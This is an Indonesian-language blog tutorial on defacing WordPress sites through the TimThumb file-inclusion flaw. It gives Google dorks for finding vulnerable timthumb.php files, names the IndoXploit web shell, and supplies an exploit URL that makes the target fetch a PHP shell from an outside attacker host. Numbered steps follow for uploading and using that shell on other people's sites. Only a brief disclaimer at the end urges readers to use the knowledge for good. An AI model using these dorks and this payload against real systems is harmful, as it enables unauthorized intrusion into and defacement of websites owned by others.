Deface Metode ThimThumb Exploit Wordpres

Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode ThimThumb Exploit Wordpres

Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja

-Dork

inurl:/wp-content/themes/deepfocus/timthumb.php
inurl:/wp-content/themes/infores/timthumb.php
inurl:/timthumb.php site

Kembangin aja agar dapat yg vuln

-Exploit

thimthumb.php
tum.php
thumb.php DLL

-Exploit Upload shel

?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php

Baiklah langsung saja kita mulai

1. Kembangkan dork di atas, bagian timthumb ubah aja menjadi tum atau thumb agar dapat yg vuln

2. Jika sudah masukkan exploitnya seperti ini
site.co.li/[PATCH]/thumb.php
Jika vuln akan ada seperti ini
Catatan:Bug ini ada di thimthumb version 2.00 ke bawah

3. Langsung aja kita exsekusi (Upload shel) dengan cara tambahkan exploit upload shel di atas di bagian thumb.php seperti ini
site.co.li/[PATHC]/thumb.php?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php

4. Jika work akan ada md5 seperti di bawah ini, Md5 tersebut adalah shel kalian

5. Buka tab baru di browser kalian, kemudian copykan aksese shel kalian
Di sini saya hanya menggunakan uploader

6. Upload shel kalian

Langkah selanjutnya, Bebas kalian mau ngapain aja

Terimakasih buat kalian semua karena telah membaca Content "Deface Metode ThimThumb Exploit Wordpres" Setelah membaca
Saya ingin menjelaskan beberapa HAL, jika kalian terkena masalah web ini tidak akan betanggung jawab atas masalah kalian. Jadi intinya gunakanlah ilmu kalina untuk sesuatu yang berguna atau gunakan untuk kebaikan, jangan di pakai untuk merusak mulu
Jika kalian paham Cukup Sekian